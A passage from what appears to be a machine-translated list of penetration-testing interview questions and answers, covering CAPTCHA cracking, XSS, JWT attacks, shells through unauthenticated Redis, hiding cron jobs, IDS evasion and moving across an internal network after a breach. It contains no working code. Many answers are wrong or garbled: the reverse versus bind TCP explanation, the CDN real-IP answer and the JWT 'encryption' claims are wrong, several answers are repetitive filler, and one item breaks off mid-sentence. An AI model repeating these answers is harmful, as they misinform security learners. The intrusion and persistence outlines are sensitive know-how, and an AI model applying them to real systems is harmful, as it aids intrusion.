You can use tools to submit HTTP requests to the form containing the verification code on the specified page, crack the verification code, and ultimately achieve successful registration. However, the mobile phone cannot receive the SMS verification information, thus bypassing operations such as mobile phone binding.
2. **Access to restricted features:**
Verification codes can be used to improperly access restricted functions. When the functions have been designed, only specific users can access them. However, if means such as cracking are used, illegal access can be achieved.
3. **Front desk form submission:**
When the front-end form is submitted, the verification code is used to crack the correct submission of the system, so that as long as the correct verification code is cracked, the form can be submitted without restriction, which ultimately leads to abnormal system load in the background.
4. **Get gifts:**
Cracking the verification code can obtain a large number of gifts, even some special gifts with a certain value, thereby achieving the attacker's benefit.
Verification code defense methods
1. **Accurate verification:**
When comparing the verification code with the verification code entered by the user, it is accurate to compare spaces and punctuation marks, thereby reducing the chance of the verification code being cracked.
2. **Use image verification code:**
Because the image verification code uses real pictures, it increases the difficulty of verification, so it can better prevent robot attacks and the possibility of being cracked by scripts.
3. **Dynamic adjustment of verification code:**
Dynamically adjust the form of the verification code so that the verification code is displayed differently each time, which not only deceives the machine, but also reduces the possibility of brute force cracking.
4. **Timely update and update the verification code strategy:**
With the continuous development of technology, what is effective in cracking verification codes is also constantly changing. Therefore, it is recommended that verification codes should be updated in time, and longer and more complex verification codes should be used to make the cracking algorithm as difficult as possible. Crack.
56. What content will you test for cookies?
1. Check whether the cookie value is as expected.
2. Test whether the cookie is deleted correctly according to the set validity period.
3. Check cookies for security vulnerabilities.
4. Test whether the cookie is stored on the client side in a secure manner.
5. Check whether the cookie value is tracked across sites. This type of cookie is used for illegal purposes.
6. Test the compatibility of cookies on different browsers.
7. Check whether the cookie value is encoded to prevent attackers from obtaining valid data.
8. Check whether the uri path is set correctly to ensure that the cookie is sent correctly.
9. Check whether cookie preference settings are strict to ensure security.
10. Check that all data sent to cookies is encoded, compressed or encrypted to prevent unauthorized third-party access.
57. Name several types of business logic vulnerabilities?
1. Permission control vulnerability: Attackers use vulnerabilities to bypass system access restrictions and obtain high-privilege unauthorized access.
2. Functional attack vulnerability: The attacker maliciously tamperes with the file structure or system information to achieve the desired effect of auxiliary operations.
3. Override of privileges vulnerability: An attacker exploits the vulnerability to gain access to protected system resources with unauthorized access.
4. Data control vulnerabilities: Attackers can use vulnerabilities to tamper with some protected data and information in the system and change their original uses.
5. Virtualization vulnerability: An attacker can obtain protected virtual machine resources or access data in a controlled dedicated virtual machine.
6. Privilege escalation vulnerability: The attacker logs in as a general user and obtains the highest authority of the system through the vulnerability.
7. Database vulnerabilities: Attackers can also access the protected database information of the system through injection, database brute force cracking and other means.
8. Coverage signature attack: The attacker tamperes with the data in the communication between the two parties and forges the return signal to impersonate the other party.
9. Buffer overflow vulnerability: An attacker uses buffer content overflow to obtain protected data in system memory.
10. Session fixation vulnerability: Attackers use session fixation technology to obtain the identity information of other users.
58. The brief description file contains vulnerabilities
A file inclusion vulnerability is a security vulnerability that causes files on the server to be illegally accessed. This vulnerability is usually caused by improper web programming implementation, allowing attackers to read data on the server from external files. In web applications, such as forms and URL parameters, developers often allow submission of information with specific values, including the path and file name of a file, so that the web application can load the corresponding file. If an attacker is able to control the provided filename, they can obtain files containing sensitive information from the server.
59. What are some examples of business logic vulnerabilities and arbitrary password resets by users, and what factors caused them?
A typical example of a user's arbitrary password reset vulnerability is that the user does not fill in a secure email address or set a security question when registering, but can still reset the password at will. This kind of vulnerability is generally caused by the lack of a complete security verification mechanism in some application systems and insufficient security protection measures to prevent unauthenticated users from resetting their passwords from the outside, which leads to the occurrence of this security vulnerability.
60. During the penetration test, I found a function that can only upload zip files. What possible ideas are there?
1. Try to bypass extension restrictions and upload other file types, such as asp/PHP/exe files, to try to access files or execute programs;
2. Compress the malicious php file into zip format, and then upload it;
3. Try to change the file structure of the zip and crack the internal files;
4. Spread malicious programs to other users or systems through zip file Trojan injection;
5. Try to decrypt the zip file protected by the uncompressed password, embodying the second layer of backdoor in an invisible place;
6. Try to obtain hidden malicious code and information by extracting file information from zip files;
7. After trying to upload the zip file, the original complete form of the compressed package is still maintained;
8. Try to find that the file information in the zip is not processed, and a vulnerability occurs;
9. Try to extract additional code with side effects from the zip;
10. Check the size of uploaded files and try to compress files that are too large before uploading;
11. Try to combine the characteristics of the compressed file itself to carry out DoS (denial of service) attack on the target system;
12. Reverse engineer the zip file and find information that can be used in the character sequence;
13. Attempt a magic box attack where a zip file is uploaded and then tampered with when downloaded, causing ";
61. Why does the aspx Trojan have greater permissions than asp?
Because the permissions of ASP pages only have simple executable permissions, while ASPX pages have permissions similar to those of a complete file system, allowing attackers to achieve more functions, such as accessing system files, viewing remote databases, adding new users, etc.
62. What are the ideas for having only one login page?
1. Detect client-side and server-side vulnerabilities in the page, such as XSS, SQL injection, etc.
2. Enumerate administrator usernames and try common passwords.
3. Test the information in the HTTP header, such as allowing cross-site scripting (XSS) in the HTTP header to prevent caching of information, etc.
4. Attempt brute force password cracking and keep trying to log in until you get the correct username and password.
5. Attempt to inject a payload into the login form to bypass the authentication process.
6. Check and test all available APIs to determine if any vulnerabilities exist.
7. Check whether the SSL/TLS certificate of the login page is valid.
8. Try accessing specific folders on the login page to see if there are any exploitable permissions issues.
9. Check whether the username and password are stored in clear text.
10. Try to let the browser inject payload into the login form by erasing cookies, modifying cookies and request header information, etc.
63. Which request headers are dangerous?
Malicious HTTP headers include:
1. X-Forwarded-For: This header indicates the IP address of the client in the HTTP request. Some clients see this header and send it to the web server to weaken client security.
2. Cookies: Cookies are the only way for web applications to identify users. If an attacker can tamper with cookies and plant malicious values into them, it may lead to unauthorized access.
3. User-Agent: Some attackers may change this header to hide their hardware and operating system models.
4. Referer: This header tracks where the user comes from. Malicious attackers may use this header to send users links to malicious websites.
64. Talk about the difference between horizontal/vertical/unauthorized access?
Horizontal unauthorized access occurs when a user attempts to access another user or resource, but is not of a higher level than him and is therefore unable to do so. Horizontal override is very important to maintain security, where users can only access their own content and not that of another user.
Vertical unauthorized access means that a user can obtain higher-level permissions after being authorized, that is, access to higher-level permissions is not allowed, but access to higher-level permissions is allowed. For example, a user who can view articles on a website but can add and modify articles has experienced vertical unauthorized access.
Unauthorized access refers to a user trying to access another unauthorized user or resource. This is an illegal behavior and the access will be immediately denied once discovered. Unauthorized overrides can compromise system integrity or result in the loss of private data, so this is a very serious issue.
65. What is xss? The dangers and principles of executing stored xss
XSS (cross-site scripting attack) is a common network attack and a classic front-end vulnerability, which can be traced to the lack of security filtering of parameters during server-side command processing. There are many types of XSS. The dangers of performing stored XSS attacks are:
1. Full execution that can be controlled by the attacker and can be achieved without user interaction;
2. Store executable code on the server to obtain user information through scripting technology;
3. Attach malicious code to normal pages and provide users with unwanted third-party content, or pop up false promotional windows.
The principle of executing stored XSS is: the server side does not filter out special characters when processing parameters and injects malicious scripts into the server side; when a user accesses a page with a malicious script, the script is automatically executed, allowing the attacker to control user's session to perform more attacks.
66. The host is suspected to be invaded. Where should I check the logs?
Where to look for logs depends on the specific operating system. You can usually look at various log files under /var/log, such as operating system security logs, application log files, etc. In addition, you can also check the system firewall logs, including access denial records on the server, and network traffic logs.
67. Commonly used standard libraries in python
1. Operating system interface: os, os.path, subprocess, shutil;
2. File wildcard: glob;
3. String processing: re, string, difflib, textwrap, unicodedata;
4. Data encoding and processing: base64, codecs, csv, xml;
5. 数学:decimal、fractions、math、random、statistics;
6. Date and time: datetime, time;
7. Split and merge data: collections, copy, heapq, bisect;
8. Data compression and archiving: zlib;
9. File loader: fnmatch;
10. Flow control and seeds: itertools;
11. Threads and processes: threading, multiprocessing;
12. Debugger: pdb;
13. Software packages: pkgutil, modulefinder, zipimport;
14. System and environment: sys, warnings, contextlib, platform, getopt, argparse;
15. Internet data processing: urllib, urllib2, http, smtplib, poplib, imaplib, ftplib, telnetlib;
16. Others: struct, copyreg, shelve, weakref.
68. What is the difference between reverse tcp and bind tcp?
There are two ways for TCP to establish a connection: Reverse TCP and Bind TCP.
Reverse TCP is a "reverse" connection between client and server, in that the client will attempt to connect to the server, and the server will then return an acknowledgment of the connection. This is the most common Transmission Control Protocol (TCP) connection model, like the HTTP connection between the client browser and the server.
Bind TCP means that the server waits for the client's connection. The server actively issues a "bind" request and then waits for the client to respond. If the client responds, the connection is successfully established. This is the model used when the client logs in to the FTP server, that is, the server listens to a certain port and waits for the client to access.
69. What problems may occur during the oauth authentication process and what kind of vulnerabilities may result?
1. Vulnerabilities that may occur during the authentication process include: incorrect authentication information, unsafe authentication information, unreliable authentication callbacks, misuse of authentication information, etc.
2. These problems may lead to vulnerabilities such as attackers stealing access tokens, injecting malicious requests, tampering with network data, and stealing users' private information.
70. How to obtain the real IP for a website that has a CDN
1. Add the ability to obtain the real IP through X-Forwarded-For: If your CDN server can set the X-Forwarded-For header, we can obtain the customer's real IP address on the server side.
2. Use CDN API: Some CDN services provide an API interface, and you can directly obtain the customer's real IP address through the API interface.
3. Obtain the real IP through HTTP header: If the CDN server adds HTTP header information, you can obtain the customer's real IP address by obtaining the HTTP header information.
4. Use Google’s open API: You can use Google’s open geolocation API to obtain results using the customer’s IP address, and you can easily obtain the customer’s real IP address.
5. Use third-party IP query API: You can use third-party IP query API to obtain the customer's real IP address.
6. Directly check the HTTP request packet: capture the source IP address of the HTTP request data on the server side, so as to obtain the customer's real IP address.
7. Use IPv6 address identification method: Detecting IPv6 addresses can identify the real IP address of the end user.
8. Get the real IP through firewall logs: You can get the customer’s real IP address from the firewall logs.
9. Obtain the real IP through server logs: The customer’s real IP address can also be identified through server logs.
10. Use NETGEAR ACE API to get the real IP: You can use the NETGEAR ACE API to get the customer's real IP address.
71. How to achieve cross-domain?
Cross-domain means that the browser prohibits loading content from one source from another source. These content may be static files such as JavaScript and CSS, or they may be dynamically generated from data on the server.
1. Use JSONP to achieve cross-domain:
JSONP (JSON with Padding) is a technology that loads another domain into the current page when only viewing html content. It allows cross-domain calling of script files to achieve cross-domain data transmission.
2. Use CORS to achieve cross-domain:
CORS (Cross-Origin Resource Sharing/Cross-Origin Resource Sharing) is a technology used to implement cross-origin requests, which allows browsers to send and receive cross-origin http requests for cross-domain data transmission.
3. Use Nginx proxy to achieve cross-domain:
Using Nginx proxy is for http requests initiated by ajax. Using the reverse proxy capability of Nginx, the request initiated by the client to the server is forwarded by the Nginx server to the source server. The return value obtained by the client is still obtained by the Nginx server. Returned to achieve cross-domain purposes.
72. What is the difference between jsonp cross-domain and CORS cross-domain?
1. JSONP is a script that can solve cross-domain problems and can be used in browsers that do not support CORS. CORS is a mechanism that allows the browser to send a resource in one domain name to another domain name. .
2. JSONP is not an Ajax request in the traditional sense, but CORS is an Ajax request in the traditional sense.
3. The JSONP cross-domain process is initiated by the browser, while the CORS cross-domain process is initiated by the server.
4. JSONP has its own script tag and callback function, while CORS performs cross-domain operations based on HTTP header information.
5. JSONP only supports get requests, while CORS supports all types of HTTP requests.
73. Algorithms? What sorting have you learned about?
Sorting algorithms are generally divided into two categories: inner sorting and outer sorting.
Internal sorting: bubble sort, insertion sort, selection sort, Hill sort, merge sort, quick sort, heap sort, etc.
External sorting: external sorting (external sorting), record aggregation sorting (record aggregation sorting), bucket sorting (bucket sorting), file merge sorting (file merge sorting), etc.
The sorting algorithms I know are: bubble sort, insertion sort, selection sort, quick sort, Hill sort, merge sort, heap sort, bucket sort, record aggregation sort and external sort.
74. SSRF vulnerability exploitation?
SSRF vulnerability exploitation is an attack technique that exploits the Server Side Request Forgery vulnerability to allow attackers to construct special HTTP requests to access server resources on the internal network. Attackers can exploit SSRF vulnerabilities to obtain sensitive information on the internal network and even control servers on the internal network.
75. Common backdoor methods?
1. Backdoor program: An attacker can install a backdoor program in the system to gain access to the system.
2. Backdoor account: An attacker can create a backdoor account to gain access to the system.
3. Backdoor service: An attacker can install a backdoor service in the system to gain access to the system.
4. Backdoor port: An attacker can open a backdoor port in the system to gain access to the system.
5. Backdoor file: An attacker can create a backdoor file in the system to gain access to the system.
6. Backdoor network: An attacker can create a backdoor network in a system to gain access to the system.
7. Backdoor script: An attacker can create a backdoor script in the system to gain access to the system.
8. Backdoor program replacement: An attacker can replace a backdoor program in the system to gain access to the system.
76. How to bypass directory access restrictions in open basedir?
1. Using the absolute path of open_basedir: An attacker can use the absolute path of open_basedir to bypass the restrictions of open_basedir and access other directories on the system.
2. Using the relative path of open_basedir: An attacker can use the relative path of open_basedir to bypass the restrictions of open_basedir and access other directories on the system.
3. Using open_basedir's path traversal: An attacker can use open_basedir's path traversal to bypass the restrictions of open_basedir and access other directories on the system.
4. Using open_basedir's path enumeration: An attacker can use open_basedir's path enumeration to bypass the restrictions of open_basedir and access other directories on the system.
5. Using open_basedir's path replacement: An attacker can use open_basedir's path replacement to bypass the restrictions of open_basedir and access other directories on the system.
77. What are the common problems in PHP code audit?
1. Database query: SQL injection, cross-site scripting attack (XSS), remote file inclusion (RFI), etc.
2. File upload: file upload vulnerabilities, file inclusion vulnerabilities, etc.
3. Permission control: unauthorized access, unauthorized access, etc.
4. Data transmission: data encryption, data signature, etc.
5. Network security: network attacks, malicious code, etc.
6. System security: system vulnerabilities, malicious programs, etc.
7. Others: buffer overflow, path traversal attacks, etc.
78. In the red-blue confrontation, the scene and posture of the blue team counterattacking the red team?
Fishing, Honey Pot, Ant Sword RCE
79. Linux scheduled tasks, what would a hacker do to hide his scheduled tasks?
1. Use the crontab -e command to edit the crontab file and add the scheduled task to the file, but do not use plain text, but use encrypted form, such as base64 encoding.
2. Place the scheduled task in a hidden folder and give the folder a hidden name to prevent others from discovering it.
3. Use the hidden file function of Linux to set the scheduled task file as a hidden file to prevent others from discovering it.
4. Use the file permissions function of Linux to set the scheduled task file to read-only to prevent others from modifying it.
5. Use the file attribute function of Linux to set the scheduled task file to be invisible to prevent others from discovering it.
6. Use Linux's file system encryption function to encrypt scheduled task files to prevent others from cracking them.
7. Use the hidden process function of Linux to set the scheduled task process to be hidden to prevent others from discovering it.
8. Use the hidden port function of Linux to set the scheduled task port to be hidden to prevent others from discovering it.
9. Use the hidden network function of Linux to set the scheduled task network to be hidden to prevent others from discovering it.
10. Use the hidden file system function of Linux to set the scheduled task file system to be hidden to prevent others from discovering it.
80. What are the common ways to get shell without Redis authorization?
1. Exploit the unauthorized access vulnerability of Redis to obtain remote control by writing webshell;
2. Upload the webshell file to the Redis server, and then read the file content in Redis;
3. Exploit the unauthorized access vulnerability of Redis to obtain remote control by executing arbitrary commands on the Redis server;
4. Exploit the unauthorized access vulnerability of Redis, store the Trojan file as a string in Redis, and then call the Trojan in Redis to obtain remote control.
5. If Redis enables the RDB mode backup function, you can hide the webshell file in the backup file, and then read the file content in Redis;
6. If Redis enables the AOF mode persistence function, you can write the webshell file as an execution command to the AOF file, and then read the file content in Redis;
7. If Redis enables the master-slave structure, you can transfer the webshell file to the slave library as data, and then read the file content in Redis.
8. If Redis allows the client to execute scripts, you can transfer the webshell file to Redis as a script, and then execute the script in Redis to obtain remote control.
9. Use the Redis message queue function to send the webshell file to Redis as a message, and then read the file content in Redis.
10. If Redis allows clients to use the EVAL command, you can send the webshell file to Redis as a LUA script and execute the script to obtain remote control.
81. JWT attack methods? (Header, payload, signature)
1. Utilize JWT overwriting attack: Use another JWT to overwrite the previous JWT, so that the session remains in the old JWT, and the server cannot sense this overwriting behavior, thus creating a feasible vulnerability for the attacker.
2. Exploiting JWT encryption attacks: Since JWT is saved in clear text, an attacker can try to crack the JWT, steal the token, decode and send a request to access the protected resource.
3. Utilize JWT tampering attacks: tamper with the payload or header information in the JWT, thereby changing the content or scope of the request.
4. Utilize JWT payload update attack: The attacker updates its permissions by adding additional payloads to the JWT, thereby obtaining resources that are not authorized to be accessed.
5. Exploiting JWT signature attacks: An attacker can use a malicious signature to make a JWT trustworthy in an unauthorized manner, and use the altered JWT to access protected resources in the application.
6. Attempting brute force: An attacker can try to guess and crack the JWT's key multiple times to obtain the session token.
7. Time-to-live attack: An attacker can create a JWT so that it has a longer survival time than the actual permission expiration time.
8. Exploiting JWT caching attacks: JWT may be cached in a proxy server or browser, so an attacker can obtain a valid JWT from it.
9. Exploiting JWT replay attacks: An attacker can intercept requests for protected resources, obtain the JWT and resend it to gain access.
10. Attack using absolute paths in JWT: Because JWT may use absolute paths instead of relative paths, attackers can use this absolute path to obtain higher permissions.
82. What are some examples of JAVA middleware vulnerabilities?
1. Apache Tomcat Cipher Transformation Connection Improper Configuration Vulnerability (CVE-2015-5351)
2. Apache Tomcat reflective file upload vulnerability (CVE-2017-12615)
3. Apache Tomcat HttpOnly mark missing vulnerability (CVE-2008-5515)
4. Apache ActiveMQ reflective command execution vulnerability (CVE-2015-1830)
5. Apache Struts2 invalid escape vulnerability (CVE-2016-3087)
6. Apache HTTP Server protocol improper handling vulnerability (CVE-2016-8743)
7. IBM WebSphere Application Server LDAP injection vulnerability (CVE-2016-9458)
8. IBM WebSphere Application Server XFF header information leakage vulnerability (CVE-2015-2080)
9. IBM WebSphere Application Server parameter injection vulnerability (CVE-2017-1393)
10. Oracle WebLogic Server weak password vulnerability (CVE-2018-2628)
83. What vulnerabilities can DNS takeout be used for?
1. SQL injection: Using DNS takeaways, an attacker can read database files on a protected server to retrieve meaningful information.
2. Cross-site scripting attack: Attackers can use DNS outsourcing to install malicious scripts on the victim's browser to obtain account information.
3. XML external entity attack: Through DNS outsourcing, the attacker can inject malicious code into the victim's system, allowing the attacker to gain more permissions.
4. DNS spoofing/hijacking: By utilizing DNS takeaway, an attacker can hijack the DNS resolution of the target system and redirect the request to a malicious server.
5. XSS attack: Attackers can use DNS outsourcing to inject malicious scripts into the target website to implement XSS attacks.
6. Denial of service attack: Attackers can use DNS outbands to carry out denial of service attacks, thereby putting pressure on the target system.
84. Summary of middleware vulnerabilities?
1. Weak password vulnerability in routers and router web management interfaces: attackers can brute force crack the login password of the router's web management interface and steal the router's sensitive information;
2. System password management vulnerabilities: System administrators use default passwords and easy-to-guess passwords, making it easier for attackers to obtain sensitive system information;
3. Improper configuration of middleware vulnerabilities: System administrators may improperly configure some sensitive information, such as interface configuration, interface requests, and transmission encryption, allowing attackers to access this sensitive information;
4. Middleware remote service vulnerability: The system administrator may have opened the remote service, and the attacker can attack the service and perform brute force cracking, etc.;
5. Middleware deserialization vulnerability: When processing deserialized data, many verification steps may be ignored, allowing attackers to construct malicious code;
6. Middleware XML external entity attack vulnerability: Attackers can use XML external entity attacks to access sensitive information through the XML parser;
7. Middleware online application vulnerabilities: attackers may attack online applications and steal sensitive information related to middleware;
8. Improper access control vulnerabilities: Administrators may ignore restrictions on resource access, allowing attackers to access sensitive system information;
9. Insecure coding vulnerability in middleware: Administrators may neglect to encrypt sensitive information, allowing attackers to access sensitive system information;
10. Middleware debugging vulnerability: System administrators may improperly enable the system debugging function, causing attackers to obtain middleware system information;
85. Talk about the idea of elevating privileges in Windows and Linux systems?
Ideas for elevating privileges in Windows systems:
1. Exploiting vulnerabilities: Log in to the system as the administrator with the highest authority, collect and exploit vulnerabilities in the Windows system (including local vulnerabilities and remote vulnerabilities) to escalate privileges.
2. Exploitation tools: By using some privilege escalation tools (such as FuzzySecurity's privilege escalation tool), you can also escalate the system's privileges even when you have permission.
Ideas for elevating privileges in Linux systems:
1. Exploiting vulnerabilities: Similar to Windows systems, existing vulnerabilities are exploited to escalate privileges, but the loopholes in Linux systems are more serious and it is easier to escalate privileges.
2. Utilization tools: Similar to Windows systems, you can use scripts and various privilege escalation tools released by the industry. You can also escalate the system privileges when you have permission.
86. What frameworks does python have and what vulnerabilities have appeared in them?
Python frameworks include: Django, Flask, Tornado, Pyramid, Web2py, Bottle, Hug, Cherrypy, etc.
Vulnerabilities that have appeared include: XML entity injection vulnerability in Django, Jinja2 template injection vulnerability in Flask, XML entity injection vulnerability in Pyramid, SSL encrypted data leakage vulnerability in Web2py, remote code execution vulnerability in Bottle, Hug Path traversal vulnerabilities, etc.
87. The difference between small program penetration and ordinary penetration
1. The characteristics of small program penetration are mainly application layer penetration, including interface security detection, login verification, permission control, etc., while ordinary penetration needs to rely on system architecture and penetration from the underlying protocol layer, including port interception, patch attacks, and Web security. Detection, database auditing, etc.
2. The purpose of mini program penetration is to detect the security vulnerabilities of the mini program and detect the security of the mini program, while the purpose of ordinary penetration is to detect the security vulnerabilities of the system, detect the behavior audit of the system, and detect the security of the system.
3. Mini program penetration technology focuses more on security detection at the application layer, while ordinary penetration technology mainly focuses on security detection at the network layer and above.
88. Four major components of vulnerability testing of the app itself
1. Compilation and build tools: Compilation and build tools can help developers compile and build Android apps on specific hardware platforms. These tools can find potential vulnerabilities in the source code, such as checking for unused code, unreleased resource, or a hard-coded value for use in non-secure environments.
2. Application shelling: Application shelling is a static analysis technology used to analyze the source code of an application. It can detect incorrect input validation, incorrect error handling, use of uninitialized variables, or other potential problems.
3. Simulator: The simulator is a dynamic analysis technology that can simulate the behavior of an application on a real device and detect anomalies, such as incorrect memory access, incorrect exception handling, etc.
4. Testing framework: Testing framework is a testing method that combines static analysis and dynamic analysis. It allows developers to examine the application's code before implementing tests, and helps testers run the application to detect vulnerabilities.
89. IDS/IPS protection principles and bypass ideas
IDS/IPS protection mainly uses a combination of common static detection (static analysis), dynamic detection and behavioral analysis.
Static detection focuses on the characteristics of malicious behavior, such as identifying characteristics, connection characteristics, structural characteristics, etc., and analyzes data packets to confirm whether there are specific virus characteristics, thereby detecting virus attacks.
Dynamic detection, by simulating the system environment or simulating virus operation, observes whether the virus has aggressive behavior, thereby judging the aggressiveness of the virus.
Behavior analysis, by analyzing the characteristics of network behavior, determines whether there is an attack behavior, and thereby determines whether there is a virus attack.
Ways to bypass IDS/IPS protection:
1. Network camouflage: Use the traffic around the attacker's system as network infrastructure, change the source address or destination address, and use this as a means to bypass the IDS/IPS system;
2. Increase the length of data packets: Attackers can increase the length of data packets and fragment the data for transmission. Malicious data packets can be hidden in other data packets, thereby bypassing the detection of the IDS/IPS system;
3. Use special characters: Attackers can use special characters to make malicious data packets into uncommon features as a means to bypass the IDS/IPS system;
4. Encrypted transmission: Attackers can use encrypted transmission so that malicious data packets will not be identified by the IDS/IPS system during transmission, thereby bypassing detection and blocking.
90. Utilization of json’s csrf
CSRF, which stands for Cross-Site Request Forgery, is an attack that exploits the user's trust that they are already logged into a website to trick the user into performing an action they do not intend. JSON programs can also be attacked by CSRF. The victim unknowingly accessed the JSON web page prepared by the attacker at will, thus turning the victim's legal operation into the attacker's illegal operation.
To prevent cross-site request forgery attacks, you can take some defensive measures, such as adding a CSRF token to each JSON request, adding a Referer header to each request header to confirm the website of the request initiator, in the JSON client Add a security token, enable HTTPOnly to prevent JSON deserialization injection, write solid code to limit the number of JSON requests, and enable security controls for intranet environments, etc.
91. What vulnerabilities can be tested using data packets in json format?
JSON format data packets can test multiple vulnerabilities such as server-side script injection vulnerabilities, SQL injection vulnerabilities, XML external entity injection vulnerabilities, XXE vulnerabilities, PATH injection vulnerabilities, reflected XSS vulnerabilities, and stored XSS vulnerabilities.
92. How to collect information on the intranet server?
1. Information collection through search engines: Use Google, Bing and other search engines to search for information about intranet servers;
2. Collect information through Whois query: Whois query can query the IP address, owner information, etc. of the intranet server;
3. Use the websites of network investigation companies such as Netcraft to collect information: The websites of network investigation companies such as Netcraft can query the IP address, operating system version, server type, etc. of the intranet server;
4. Collect information through the port scanner: The port scanner can query the open ports of the intranet server and determine the programs running on the server;
5. Collect information through vulnerability scanners: Vulnerability scanners can query whether there are security vulnerabilities in the intranet server and determine the vulnerability of the server;
6. Collect information through packet capture tools: Packet capture tools can capture the network data packets of the server and check the running status of the server.
93. If you take down a certain machine on the boundary layer of the intranet, how to detect other machines on the intranet?
1. First, the obtained intranet machine should be analyzed to obtain the operating system and hardware configuration on the machine, as well as the installed software, in order to maximize its advantages as an intranet attacker.
2. Then, you should run some tools to discover surrounding hosts, enable all available ports in the intranet, and view the services they provide and their responses to other services.
3. By scanning the available IP address space, the existence of another computer can be identified and the type of this machine can be determined.
4. Try to connect to other computers on the intranet, and try to log in to user accounts on the systems of other computers on the intranet.
5. Try to execute some malware like viruses and Trojans to attack other computers on the intranet.
6. Launch a series of attacks within the target intranet to obtain useful information, such as credentials that can be used to access the system or network, or breach points for escalating privileges.
7. Finally, you should try to use the obtained information to attack other computers in the intranet to obtain valid information and permissions.